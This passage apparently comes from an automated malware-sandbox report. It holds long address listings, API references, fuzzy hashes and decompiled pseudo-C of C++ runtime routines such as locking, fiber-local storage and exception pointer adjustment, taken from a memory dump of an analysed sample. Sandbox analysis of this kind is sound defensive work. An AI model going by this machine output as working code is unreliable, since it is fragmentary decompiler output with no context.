                                                                                      0x00408a78
                                                                                      0x00408aa5
                                                                                      0x00408aa7
                                                                                      0x00408aa9
                                                                                      0x00408aab
                                                                                      0x00408ab4
                                                                                      0x00408ab6
                                                                                      0x00408ab8
                                                                                      0x00408abb
                                                                                      0x00408abb
                                                                                      0x00408abe
                                                                                      0x00408ac4
                                                                                      0x00408ad3
                                                                                      0x00408ad5
                                                                                      0x00408ae7
                                                                                      0x00408ae7
                                                                                      0x00408ad7
                                                                                      0x00408ad8
                                                                                      0x00408add
                                                                                      0x00408ae0
                                                                                      0x00408ae3
                                                                                      0x00408ae3
                                                                                      0x00000000
                                                                                      0x00408ac6
                                                                                      0x00408ac6
                                                                                      0x00408ac6
                                                                                      0x00408ac9
                                                                                      0x00408acb
                                                                                      0x00408b72
                                                                                      0x00408b72
                                                                                      0x00000000
                                                                                      0x00408ad1
                                                                                      0x00000000
                                                                                      0x00408ad1
                                                                                      0x00408acb
                                                                                      0x00408aad
                                                                                      0x00408aad
                                                                                      0x00000000
                                                                                      0x00408aad
                                                                                      0x00408a7a
                                                                                      0x00408a7a
                                                                                      0x00408a7c
                                                                                      0x00408a81
                                                                                      0x00408a81
                                                                                      0x00408a84
                                                                                      0x00408a85
                                                                                      0x00408a8a
                                                                                      0x00408a8d
                                                                                      0x00408a8f
                                                                                      0x00408b77
                                                                                      0x00408b77
                                                                                      0x00408b7c
                                                                                      0x00408b7d
                                                                                      0x00408b7e
                                                                                      0x00408b7f
                                                                                      0x00408b80
                                                                                      0x00408b81
                                                                                      0x00408b83
                                                                                      0x00408b86
                                                                                      0x00408b87
                                                                                      0x00408b89
                                                                                      0x00408b90
                                                                                      0x00408b91
                                                                                      0x00408b94
                                                                                      0x00408b99
                                                                                      0x00408b9c
                                                                                      0x00408b9d
                                                                                      0x00408b9f
                                                                                      0x00408ced
                                                                                      0x00000000
                                                                                      0x00408ba5
                                                                                      0x00408ba5
                                                                                      0x00408ba8
                                                                                      0x00408bad
                                                                                      0x00408bb0
                                                                                      0x00408bb3
                                                                                      0x00408bb6
                                                                                      0x00408bb8
                                                                                      0x00408be5
                                                                                      0x00408be7
                                                                                      0x00408be9
                                                                                      0x00408beb
                                                                                      0x00408bf4
                                                                                      0x00408bf6
                                                                                      0x00408bf8
                                                                                      0x00408bfb
                                                                                      0x00408bfb
                                                                                      0x00408bfe
                                                                                      0x00408c04
                                                                                      0x00408c13
                                                                                      0x00408c15
                                                                                      0x00408c27
                                                                                      0x00408c27
                                                                                      0x00408c17
                                                                                      0x00408c18
                                                                                      0x00408c1d
                                                                                      0x00408c20
                                                                                      0x00408c23
                                                                                      0x00408c23
                                                                                      0x00000000
                                                                                      0x00408c06
                                                                                      0x00408c06
                                                                                      0x00408c06
                                                                                      0x00408c09
                                                                                      0x00408c0b
                                                                                      0x00408cf2
                                                                                      0x00408cf2
                                                                                      0x00000000
                                                                                      0x00408c11
                                                                                      0x00000000
                                                                                      0x00408c11
                                                                                      0x00408c0b
                                                                                      0x00408bed
                                                                                      0x00408bed
                                                                                      0x00000000
                                                                                      0x00408bed
                                                                                      0x00408bba
                                                                                      0x00408bba
                                                                                      0x00408bbc
                                                                                      0x00408bc1
                                                                                      0x00408bc1
                                                                                      0x00408bc4
                                                                                      0x00408bc5
                                                                                      0x00408bca
                                                                                      0x00408bcd
                                                                                      0x00408bcf
                                                                                      0x00408cf7
                                                                                      0x00408cf7
                                                                                      0x00408cfc
                                                                                      0x00408cfd
                                                                                      0x00408cfe
                                                                                      0x00408cff
                                                                                      0x00408d00
                                                                                      0x00408d01
                                                                                      0x00408d03
                                                                                      0x00408d06
                                                                                      0x00408d07
                                                                                      0x00408d09
                                                                                      0x00408d10
                                                                                      0x00408d11
                                                                                      0x00408d14
                                                                                      0x00408d19
                                                                                      0x00408d1c
                                                                                      0x00408d1d
                                                                                      0x00408d1f
                                                                                      0x00408e4c
                                                                                      0x00000000
                                                                                      0x00408d25
                                                                                      0x00408d25
                                                                                      0x00408d28
                                                                                      0x00408d2d
                                                                                      0x00408d30
                                                                                      0x00408d33
                                                                                      0x00408d36
                                                                                      0x00408d38
                                                                                      0x00408d65
                                                                                      0x00408d67
                                                                                      0x00408d69
                                                                                      0x00408d6b
                                                                                      0x00408d74
                                                                                      0x00408d76
                                                                                      0x00408d78
                                                                                      0x00408d7b
                                                                                      0x00408d7b
                                                                                      0x00408d7e
                                                                                      0x00408d84
                                                                                      0x00408d93
                                                                                      0x00408d95
                                                                                      0x00408da7
                                                                                      0x00408da7
                                                                                      0x00408d97
                                                                                      0x00408d98
                                                                                      0x00408d9d
                                                                                      0x00408da0
                                                                                      0x00408da3
                                                                                      0x00408da3
                                                                                      0x00000000
                                                                                      0x00408d86
                                                                                      0x00408d86
                                                                                      0x00408d86
                                                                                      0x00408d89
                                                                                      0x00408d8b
                                                                                      0x00408e51
                                                                                      0x00408e51
                                                                                      0x00000000
                                                                                      0x00408d91
                                                                                      0x00000000
                                                                                      0x00408d91
                                                                                      0x00408d8b
                                                                                      0x00408d6d
                                                                                      0x00408d6d
                                                                                      0x00000000
                                                                                      0x00408d6d
                                                                                      0x00408d3a
                                                                                      0x00408d3a
                                                                                      0x00408d3c
                                                                                      0x00408d41
                                                                                      0x00408d41
                                                                                      0x00408d44
                                                                                      0x00408d45
                                                                                      0x00408d4a
                                                                                      0x00408d4d
                                                                                      0x00408d4f
                                                                                      0x00408e56
                                                                                      0x00408e56
                                                                                      0x00408e5b
                                                                                      0x00408e5c
                                                                                      0x00408e5d
                                                                                      0x00408e5e
                                                                                      0x00408e5f
                                                                                      0x00408e60
                                                                                      0x00408e62
                                                                                      0x00408e64
                                                                                      0x004071d0
                                                                                      0x004071d1
                                                                                      0x004071d3
                                                                                      0x004071d7
                                                                                      0x0040723d
                                                                                      0x0040723e
                                                                                      0x004071d9
                                                                                      0x004071dc
                                                                                      0x004071dd
                                                                                      0x004071de
                                                                                      0x004071eb
                                                                                      0x00407201
                                                                                      0x0040720a
                                                                                      0x0040721e
                                                                                      0x0040721e
                                                                                      0x00407220
                                                                                      0x00407228
                                                                                      0x0040722e
                                                                                      0x00407235
                                                                                      0x00000000
                                                                                      0x0040720c
                                                                                      0x0040720c
                                                                                      0x0040720f
                                                                                      0x00407212
                                                                                      0x0040721a
                                                                                      0x0040723f
                                                                                      0x00407244
                                                                                      0x00407245
                                                                                      0x00407246
                                                                                      0x00407247
                                                                                      0x00407248
                                                                                      0x00407249
                                                                                      0x0040724a
                                                                                      0x0040724b
                                                                                      0x0040724c
                                                                                      0x0040724d
                                                                                      0x0040724e
                                                                                      0x0040724f
                                                                                      0x00407250
                                                                                      0x00407253
                                                                                      0x00407257
                                                                                      0x00407258
                                                                                      0x0040725a
                                                                                      0x00407260
                                                                                      0x00407262
                                                                                      0x00407265
                                                                                      0x0040726a
                                                                                      0x00407271
                                                                                      0x0040721c
                                                                                      0x0040721c
                                                                                      0x00000000
                                                                                      0x0040721c
                                                                                      0x0040721a
                                                                                      0x0040720a
                                                                                      0x00408e6a
                                                                                      0x00408e6a
                                                                                      0x00408e6a
                                                                                      0x00408d55
                                                                                      0x00408d55
                                                                                      0x00408d58
                                                                                      0x00408d5b
                                                                                      0x00408d5e
                                                                                      0x00408da9
                                                                                      0x00408dac
                                                                                      0x00408db3
                                                                                      0x00408db9
                                                                                      0x00408dbc
                                                                                      0x00408dc1
                                                                                      0x00408dc4
                                                                                      0x00408dc8
                                                                                      0x00408dcb
                                                                                      0x00408dcc
                                                                                      0x00408e23
                                                                                      0x00408e24
                                                                                      0x00408e25
                                                                                      0x00408e31
                                                                                      0x00408e3c
                                                                                      0x00408e41
                                                                                      0x00408e49
                                                                                      0x00408dce
                                                                                      0x00408dce
                                                                                      0x00408dd0
                                                                                      0x00408dd1
                                                                                      0x00408dd2
                                                                                      0x00408de0
                                                                                      0x00408de8
                                                                                      0x00408dee
                                                                                      0x00408def
                                                                                      0x00408df2
                                                                                      0x00408df8
                                                                                      0x00408e0c
                                                                                      0x00408e0c
                                                                                      0x00408e0e
                                                                                      0x00408e16
                                                                                      0x00408e20
                                                                                      0x00408dfa
                                                                                      0x00408dfa
                                                                                      0x00408dfd
                                                                                      0x00408e00
                                                                                      0x00408e02
                                                                                      0x00408e05
                                                                                      0x00408e08
                                                                                      0x00000000
                                                                                      0x00408e0a
                                                                                      0x00408e0a
                                                                                      0x00000000
                                                                                      0x00408e0a
                                                                                      0x00408e08
                                                                                      0x00408df8
                                                                                      0x00408dcc
                                                                                      0x00408d4f
                                                                                      0x00408d38
                                                                                      0x00408bd5
                                                                                      0x00408bd5
                                                                                      0x00408bd8
                                                                                      0x00408bdb
                                                                                      0x00408bde
                                                                                      0x00408c29
                                                                                      0x00408c2c
                                                                                      0x00408c33
                                                                                      0x00408c36
                                                                                      0x00408c3b
                                                                                      0x00408c3e
                                                                                      0x00408c42
                                                                                      0x00408c45
                                                                                      0x00408c4d
                                                                                      0x00408c50
                                                                                      0x00408c54
                                                                                      0x00408c57
                                                                                      0x00408cb9
                                                                                      0x00408cba
                                                                                      0x00408cbb
                                                                                      0x00408cc7
                                                                                      0x00408cd2
                                                                                      0x00408cd8
                                                                                      0x00408ce0
                                                                                      0x00408cea
                                                                                      0x00408c59
                                                                                      0x00408c59
                                                                                      0x00408c5b
                                                                                      0x00408c5c
                                                                                      0x00408c5d
                                                                                      0x00408c6b
                                                                                      0x00408c7c
                                                                                      0x00408c84
                                                                                      0x00408c87
                                                                                      0x00408c88
                                                                                      0x00408c8e
                                                                                      0x00408ca2
                                                                                      0x00408ca2
                                                                                      0x00408ca4
                                                                                      0x00408cac
                                                                                      0x00408cb6
                                                                                      0x00408c90
                                                                                      0x00408c90
                                                                                      0x00408c93
                                                                                      0x00408c96
                                                                                      0x00408c98
                                                                                      0x00408c9b
                                                                                      0x00408c9e
                                                                                      0x00000000
                                                                                      0x00408ca0
                                                                                      0x00408ca0
                                                                                      0x00000000
                                                                                      0x00408ca0
                                                                                      0x00408c9e
                                                                                      0x00408c8e
                                                                                      0x00408c57
                                                                                      0x00408bcf
                                                                                      0x00408bb8
                                                                                      0x00408a95
                                                                                      0x00408a95
                                                                                      0x00408a98
                                                                                      0x00408a9b
                                                                                      0x00408a9e
                                                                                      0x00408ae9
                                                                                      0x00408ae9
                                                                                      0x00408af0
                                                                                      0x00408af3
                                                                                      0x00408af6
                                                                                      0x00408af7
                                                                                      0x00408b48
                                                                                      0x00408b49
                                                                                      0x00408b4a
                                                                                      0x00408b4f
                                                                                      0x00408b5a
                                                                                      0x00408b5d
                                                                                      0x00408b62
                                                                                      0x00408b6a
                                                                                      0x00408af9
                                                                                      0x00408af9
                                                                                      0x00408afb
                                                                                      0x00408afc
                                                                                      0x00408afd
                                                                                      0x00408b02
                                                                                      0x00408b05
                                                                                      0x00408b0e
                                                                                      0x00408b0f
                                                                                      0x00408b12
                                                                                      0x00408b17
                                                                                      0x00408b1d
                                                                                      0x00408b31
                                                                                      0x00408b31
                                                                                      0x00408b33
                                                                                      0x00408b3b
                                                                                      0x00408b45
                                                                                      0x00408b1f
                                                                                      0x00408b1f
                                                                                      0x00408b22
                                                                                      0x00408b25
                                                                                      0x00408b27
                                                                                      0x00408b2a
                                                                                      0x00408b2d
                                                                                      0x00000000
                                                                                      0x00408b2f
                                                                                      0x00408b2f
                                                                                      0x00000000
                                                                                      0x00408b2f
                                                                                      0x00408b2d
                                                                                      0x00408b1d
                                                                                      0x00408af7
                                                                                      0x00408a8f
                                                                                      0x00408a78
                                                                                      0x00408a03
                                                                                      0x00408a03
                                                                                      0x00000000
                                                                                      0x00408a03
                                                                                      0x00408a01
                                                                                      0x004089f1
                                                                                      0x00000000
                                                                                      0x00408a0f
                                                                                      0x00408a0f
                                                                                      0x00408a16
                                                                                      0x00408a1d
                                                                                      0x00408a20
                                                                                      0x00408a23
                                                                                      0x00408a23
                                                                                      0x00000000
                                                                                      0x004089e0
                                                                                      0x00408980
                                                                                      0x00408980
                                                                                      0x00408983
                                                                                      0x00408987
                                                                                      0x0040898b
                                                                                      0x00408990
                                                                                      0x00408997
                                                                                      0x0040899a
                                                                                      0x00000000
                                                                                      0x0040899a
                                                                                      0x00408968
                                                                                      0x00408968
                                                                                      0x00000000
                                                                                      0x00408968
                                                                                      0x00408957
                                                                                      0x0040895d
                                                                                      0x00000000
                                                                                      0x0040895d
                                                                                      0x00408955
                                                                                      0x0040894b
                                                                                      0x0040893e
                                                                                      0x00000000

                                                                                      APIs
                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 004088D6
                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 004088F9
                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00408919
                                                                                      • std::_Facet_Register.LIBCPMT ref: 0040898B
                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 004089A3
                                                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 004089C6
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000B.00000002.604085544.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_11_2_400000_4113.jbxd
                                                                                      Similarity
                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                      • String ID:
                                                                                      • API String ID: 2081738530-0
                                                                                      • Opcode ID: 6ad374c1b7a56b3c7ab2eed5f2fdba7a828b2bb9b1b450fb738bde060c8403dc
                                                                                      • Instruction ID: 10bc4d083f0d6e5c5aa0492e0be468e715e6825d79f5f8a935fa4fa3640798b7
                                                                                      • Opcode Fuzzy Hash: 6ad374c1b7a56b3c7ab2eed5f2fdba7a828b2bb9b1b450fb738bde060c8403dc
                                                                                      • Instruction Fuzzy Hash: 7041AEB5900219CFCB11DF54E941BAEB7B0FB44724F14026EE885B7391DB38AA44CB9A
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 82%
                                                                                      			E004169FC(void* __ecx) {
                                                                                      				void* _t8;
                                                                                      				void* _t11;
                                                                                      				void* _t13;
                                                                                      				void* _t14;
                                                                                      				void* _t18;
                                                                                      				void* _t23;
                                                                                      				long _t24;
                                                                                      				void* _t27;
                                                                                      
                                                                                      				_t13 = __ecx;
                                                                                      				if( *0x443070 != 0xffffffff) {
                                                                                      					_t24 = GetLastError();
                                                                                      					_t11 = E00417C03(_t13,  *0x443070);
                                                                                      					_t14 = _t23;
                                                                                      					if(_t11 == 0xffffffff) {
                                                                                      						L5:
                                                                                      						_t11 = 0;
                                                                                      					} else {
                                                                                      						if(_t11 == 0) {
                                                                                      							if(E00417C3E(_t14,  *0x443070, 0xffffffff) != 0) {
                                                                                      								_push(0x28);
                                                                                      								_t27 = E0041823E();
                                                                                      								_t18 = 1;
                                                                                      								if(_t27 == 0) {
                                                                                      									L8:
                                                                                      									_t11 = 0;
                                                                                      									E00417C3E(_t18,  *0x443070, 0);
                                                                                      								} else {
                                                                                      									_t8 = E00417C3E(_t18,  *0x443070, _t27);
                                                                                      									_pop(_t18);
                                                                                      									if(_t8 != 0) {
                                                                                      										_t11 = _t27;
                                                                                      										_t27 = 0;
                                                                                      									} else {
                                                                                      										goto L8;
                                                                                      									}
                                                                                      								}
                                                                                      								E0041AC1E(_t27);
                                                                                      							} else {
                                                                                      								goto L5;
                                                                                      							}
                                                                                      						}
                                                                                      					}
                                                                                      					SetLastError(_t24);
                                                                                      					return _t11;
                                                                                      				} else {
                                                                                      					return 0;
                                                                                      				}
                                                                                      			}











                                                                                      0x004169fc
                                                                                      0x00416a03
                                                                                      0x00416a16
                                                                                      0x00416a1d
                                                                                      0x00416a1f
                                                                                      0x00416a23
                                                                                      0x00416a3c
                                                                                      0x00416a3c
                                                                                      0x00416a25
                                                                                      0x00416a27
                                                                                      0x00416a3a
                                                                                      0x00416a41
                                                                                      0x00416a4a
                                                                                      0x00416a4d
                                                                                      0x00416a50
                                                                                      0x00416a64
                                                                                      0x00416a64
                                                                                      0x00416a6d
                                                                                      0x00416a52
                                                                                      0x00416a59
                                                                                      0x00416a5f
                                                                                      0x00416a62
                                                                                      0x00416a76
                                                                                      0x00416a78
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00416a62
                                                                                      0x00416a7b
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00416a3a
                                                                                      0x00416a27
                                                                                      0x00416a83
                                                                                      0x00416a8d
                                                                                      0x00416a05
                                                                                      0x00416a07
                                                                                      0x00416a07

                                                                                      APIs
                                                                                      • GetLastError.KERNEL32(?,?,004169F3,0041485F,00413F7C), ref: 00416A0A
                                                                                      • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00416A18
                                                                                      • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00416A31
                                                                                      • SetLastError.KERNEL32(00000000,004169F3,0041485F,00413F7C), ref: 00416A83
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000B.00000002.604085544.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_11_2_400000_4113.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorLastValue___vcrt_
                                                                                      • String ID:
                                                                                      • API String ID: 3852720340-0
                                                                                      • Opcode ID: fd292d74ac38b52622372271c25f86de7abf80f1d2e0a9b7b98e180872a1efcc
                                                                                      • Instruction ID: a981a94b709aa5c5a0bfd01837c0d8f69c1e546bffa9a62c7f10e9c9c22eb78a
                                                                                      • Opcode Fuzzy Hash: fd292d74ac38b52622372271c25f86de7abf80f1d2e0a9b7b98e180872a1efcc
                                                                                      • Instruction Fuzzy Hash: 1C01D43620D2116EA6242BB5BE856E726A4DF037BA331833FF510611E5FF198D8256CC
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 67%
                                                                                      			E00416B13(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                                      				signed int* _t52;
                                                                                      				signed int _t53;
                                                                                      				intOrPtr _t54;
                                                                                      				signed int _t58;
                                                                                      				signed int _t61;
                                                                                      				intOrPtr _t71;
                                                                                      				signed int _t75;
                                                                                      				signed int _t79;
                                                                                      				signed int _t81;
                                                                                      				signed int _t84;
                                                                                      				signed int _t85;
                                                                                      				signed int _t97;
                                                                                      				signed int* _t98;
                                                                                      				signed char* _t101;
                                                                                      				signed int _t107;
                                                                                      				void* _t111;
                                                                                      
                                                                                      				_push(0x10);
                                                                                      				_push(0x441b50);
                                                                                      				E00413FF0(__ebx, __edi, __esi);
                                                                                      				_t75 = 0;
                                                                                      				_t52 =  *(_t111 + 0x10);
                                                                                      				_t81 = _t52[1];
                                                                                      				if(_t81 == 0 ||  *((intOrPtr*)(_t81 + 8)) == 0) {
                                                                                      					L30:
                                                                                      					_t53 = 0;
                                                                                      					__eflags = 0;
                                                                                      					goto L31;
                                                                                      				} else {
                                                                                      					_t97 = _t52[2];
                                                                                      					if(_t97 != 0 ||  *_t52 < 0) {
                                                                                      						_t84 =  *_t52;
                                                                                      						_t107 =  *(_t111 + 0xc);
                                                                                      						if(_t84 >= 0) {
                                                                                      							_t107 = _t107 + 0xc + _t97;
                                                                                      						}
                                                                                      						 *(_t111 - 4) = _t75;
                                                                                      						_t101 =  *(_t111 + 0x14);
                                                                                      						if(_t84 >= 0 || ( *_t101 & 0x00000010) == 0) {
                                                                                      							L10:
                                                                                      							_t54 =  *((intOrPtr*)(_t111 + 8));
                                                                                      							__eflags = _t84 & 0x00000008;
                                                                                      							if((_t84 & 0x00000008) == 0) {
                                                                                      								__eflags =  *_t101 & 0x00000001;
                                                                                      								if(( *_t101 & 0x00000001) == 0) {
                                                                                      									_t84 =  *(_t54 + 0x18);
                                                                                      									__eflags = _t101[0x18] - _t75;
                                                                                      									if(_t101[0x18] != _t75) {
                                                                                      										__eflags = _t84;
                                                                                      										if(_t84 == 0) {
                                                                                      											goto L32;
                                                                                      										} else {
                                                                                      											__eflags = _t107;
                                                                                      											if(_t107 == 0) {
                                                                                      												goto L32;
                                                                                      											} else {
                                                                                      												__eflags =  *_t101 & 0x00000004;
                                                                                      												_t79 = 0;
                                                                                      												_t75 = (_t79 & 0xffffff00 | ( *_t101 & 0x00000004) != 0x00000000) + 1;
                                                                                      												__eflags = _t75;
                                                                                      												 *(_t111 - 0x20) = _t75;
                                                                                      												goto L29;
                                                                                      											}
                                                                                      										}
                                                                                      									} else {
                                                                                      										__eflags = _t84;
                                                                                      										if(_t84 == 0) {
                                                                                      											goto L32;
                                                                                      										} else {
                                                                                      											__eflags = _t107;
                                                                                      											if(_t107 == 0) {
                                                                                      												goto L32;
                                                                                      											} else {
                                                                                      												E00414BF0(_t107, E004147DF(_t84,  &(_t101[8])), _t101[0x14]);
                                                                                      												goto L29;
                                                                                      											}
                                                                                      										}
                                                                                      									}
                                                                                      								} else {
                                                                                      									__eflags =  *(_t54 + 0x18);
                                                                                      									if( *(_t54 + 0x18) == 0) {
                                                                                      										goto L32;
                                                                                      									} else {
                                                                                      										__eflags = _t107;
                                                                                      										if(_t107 == 0) {
                                                                                      											goto L32;
                                                                                      										} else {
                                                                                      											E00414BF0(_t107,  *(_t54 + 0x18), _t101[0x14]);
                                                                                      											__eflags = _t101[0x14] - 4;
                                                                                      											if(_t101[0x14] == 4) {
                                                                                      												__eflags =  *_t107;
                                                                                      												if( *_t107 != 0) {
                                                                                      													_push( &(_t101[8]));
                                                                                      													_push( *_t107);
                                                                                      													goto L21;
                                                                                      												}
                                                                                      											}
                                                                                      											goto L29;
                                                                                      										}
                                                                                      									}
                                                                                      								}
                                                                                      							} else {
                                                                                      								_t84 =  *(_t54 + 0x18);
                                                                                      								goto L12;
                                                                                      							}
                                                                                      						} else {
                                                                                      							_t71 =  *0x4447a4; // 0x0
                                                                                      							 *((intOrPtr*)(_t111 - 0x1c)) = _t71;
                                                                                      							if(_t71 == 0) {
                                                                                      								goto L10;
                                                                                      							} else {
                                                                                      								 *0x4331a4();
                                                                                      								_t84 =  *((intOrPtr*)(_t111 - 0x1c))();
                                                                                      								L12:
                                                                                      								if(_t84 == 0 || _t107 == 0) {
                                                                                      									L32:
                                                                                      									E0041D1C9(_t75, _t84, _t97, _t101, _t107);
                                                                                      									asm("int3");
                                                                                      									_push(8);
                                                                                      									_push(0x441b70);
                                                                                      									E00413FF0(_t75, _t101, _t107);
                                                                                      									_t98 =  *(_t111 + 0x10);
                                                                                      									_t85 =  *(_t111 + 0xc);
                                                                                      									__eflags =  *_t98;
                                                                                      									if(__eflags >= 0) {
                                                                                      										_t103 = _t85 + 0xc + _t98[2];
                                                                                      										__eflags = _t85 + 0xc + _t98[2];
                                                                                      									} else {
                                                                                      										_t103 = _t85;
                                                                                      									}
                                                                                      									 *(_t111 - 4) =  *(_t111 - 4) & 0x00000000;
                                                                                      									_t108 =  *(_t111 + 0x14);
                                                                                      									_push( *(_t111 + 0x14));
                                                                                      									_push(_t98);
                                                                                      									_push(_t85);
                                                                                      									_t77 =  *((intOrPtr*)(_t111 + 8));
                                                                                      									_push( *((intOrPtr*)(_t111 + 8)));
                                                                                      									_t58 = E00416B13(_t77, _t103, _t108, __eflags) - 1;
                                                                                      									__eflags = _t58;
                                                                                      									if(_t58 == 0) {
                                                                                      										_t61 = E00417822(_t103, _t108[0x18], E004147DF( *((intOrPtr*)(_t77 + 0x18)),  &(_t108[8])));
                                                                                      									} else {
                                                                                      										_t61 = _t58 - 1;
                                                                                      										__eflags = _t61;
                                                                                      										if(_t61 == 0) {
                                                                                      											_t61 = E00417832(_t103, _t108[0x18], E004147DF( *((intOrPtr*)(_t77 + 0x18)),  &(_t108[8])), 1);
                                                                                      										}
                                                                                      									}
                                                                                      									 *(_t111 - 4) = 0xfffffffe;
                                                                                      									 *[fs:0x0] =  *((intOrPtr*)(_t111 - 0x10));
                                                                                      									return _t61;
                                                                                      								} else {
                                                                                      									 *_t107 = _t84;
                                                                                      									_push( &(_t101[8]));
                                                                                      									_push(_t84);
                                                                                      									L21:
                                                                                      									 *_t107 = E004147DF();
                                                                                      									L29:
                                                                                      									 *(_t111 - 4) = 0xfffffffe;
                                                                                      									_t53 = _t75;
                                                                                      									L31:
                                                                                      									 *[fs:0x0] =  *((intOrPtr*)(_t111 - 0x10));
                                                                                      									return _t53;
                                                                                      								}
                                                                                      							}
                                                                                      						}
                                                                                      					} else {
                                                                                      						goto L30;
                                                                                      					}
                                                                                      				}
                                                                                      			}



















                                                                                      0x00416b13
                                                                                      0x00416b15
                                                                                      0x00416b1a
                                                                                      0x00416b1f
                                                                                      0x00416b21
                                                                                      0x00416b24
                                                                                      0x00416b29
                                                                                      0x00416c39
                                                                                      0x00416c39
                                                                                      0x00416c39
                                                                                      0x00000000
                                                                                      0x00416b38
                                                                                      0x00416b38
                                                                                      0x00416b3d
                                                                                      0x00416b47
                                                                                      0x00416b49
                                                                                      0x00416b4e
                                                                                      0x00416b53
                                                                                      0x00416b53
                                                                                      0x00416b55
                                                                                      0x00416b58
                                                                                      0x00416b5d
                                                                                      0x00416b7f
                                                                                      0x00416b7f
                                                                                      0x00416b82
                                                                                      0x00416b85
                                                                                      0x00416ba3
                                                                                      0x00416ba6
                                                                                      0x00416be5
                                                                                      0x00416be8
                                                                                      0x00416beb
                                                                                      0x00416c10
                                                                                      0x00416c12
                                                                                      0x00000000
                                                                                      0x00416c14
                                                                                      0x00416c14
                                                                                      0x00416c16
                                                                                      0x00000000
                                                                                      0x00416c18
                                                                                      0x00416c18
                                                                                      0x00416c1d
                                                                                      0x00416c21
                                                                                      0x00416c21
                                                                                      0x00416c22
                                                                                      0x00000000
                                                                                      0x00416c22
                                                                                      0x00416c16
                                                                                      0x00416bed
                                                                                      0x00416bed
                                                                                      0x00416bef
                                                                                      0x00000000
                                                                                      0x00416bf1
                                                                                      0x00416bf1
                                                                                      0x00416bf3
                                                                                      0x00000000
                                                                                      0x00416bf5
                                                                                      0x00416c06
                                                                                      0x00000000
                                                                                      0x00416c0b
                                                                                      0x00416bf3
                                                                                      0x00416bef
                                                                                      0x00416ba8
                                                                                      0x00416ba8
                                                                                      0x00416bac
                                                                                      0x00000000
                                                                                      0x00416bb2
                                                                                      0x00416bb2
                                                                                      0x00416bb4
                                                                                      0x00000000
                                                                                      0x00416bba
                                                                                      0x00416bc1
                                                                                      0x00416bc9
                                                                                      0x00416bcd
                                                                                      0x00416bcf
                                                                                      0x00416bd2
                                                                                      0x00416bd7
                                                                                      0x00416bd8
                                                                                      0x00000000
                                                                                      0x00416bd8
                                                                                      0x00416bd2
                                                                                      0x00000000
                                                                                      0x00416bcd
                                                                                      0x00416bb4
                                                                                      0x00416bac
                                                                                      0x00416b87
                                                                                      0x00416b87
                                                                                      0x00000000
                                                                                      0x00416b87
                                                                                      0x00416b64
                                                                                      0x00416b64
                                                                                      0x00416b69
                                                                                      0x00416b6e
                                                                                      0x00000000
                                                                                      0x00416b70
                                                                                      0x00416b72
                                                                                      0x00416b7b
                                                                                      0x00416b8a
                                                                                      0x00416b8c
                                                                                      0x00416c4b
                                                                                      0x00416c4b
                                                                                      0x00416c50
                                                                                      0x00416c51
                                                                                      0x00416c53
                                                                                      0x00416c58
                                                                                      0x00416c5d
                                                                                      0x00416c60
                                                                                      0x00416c63
                                                                                      0x00416c66
                                                                                      0x00416c6f
                                                                                      0x00416c6f
                                                                                      0x00416c68
                                                                                      0x00416c68
                                                                                      0x00416c68
                                                                                      0x00416c72
                                                                                      0x00416c76
                                                                                      0x00416c79
                                                                                      0x00416c7a
                                                                                      0x00416c7b
                                                                                      0x00416c7c
                                                                                      0x00416c7f
                                                                                      0x00416c88
                                                                                      0x00416c88
                                                                                      0x00416c8b
                                                                                      0x00416cc1
                                                                                      0x00416c8d
                                                                                      0x00416c8d
                                                                                      0x00416c8d
                                                                                      0x00416c90
                                                                                      0x00416ca7
                                                                                      0x00416ca7
                                                                                      0x00416c90
                                                                                      0x00416cc6
                                                                                      0x00416cd0
                                                                                      0x00416cdc
                                                                                      0x00416b9a
                                                                                      0x00416b9a
                                                                                      0x00416b9f
                                                                                      0x00416ba0
                                                                                      0x00416bda
                                                                                      0x00416be1
                                                                                      0x00416c25
                                                                                      0x00416c25
                                                                                      0x00416c2c
                                                                                      0x00416c3b
                                                                                      0x00416c3e
                                                                                      0x00416c4a
                                                                                      0x00416c4a
                                                                                      0x00416b8c
                                                                                      0x00416b6e
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00416b3d

                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000B.00000002.604085544.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_11_2_400000_4113.jbxd
                                                                                      Similarity
                                                                                      • API ID: AdjustPointer
                                                                                      • String ID: 0'@
                                                                                      • API String ID: 1740715915-1999884151
                                                                                      • Opcode ID: cf55cfc8811bcc94d609aa46f2ca9d753594eed5593bf723ced99c066139c1ca
                                                                                      • Instruction ID: 349f1c95a76813cf8c56dd8e4b04975026008980cbef37f8812b81d4e85a4b47
                                                                                      • Opcode Fuzzy Hash: cf55cfc8811bcc94d609aa46f2ca9d753594eed5593bf723ced99c066139c1ca
                                                                                      • Instruction Fuzzy Hash: FA510172604212AFDB288F15D941BEA77A4EF10304F12452FEC8687290F739ECC1CB98
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 75%
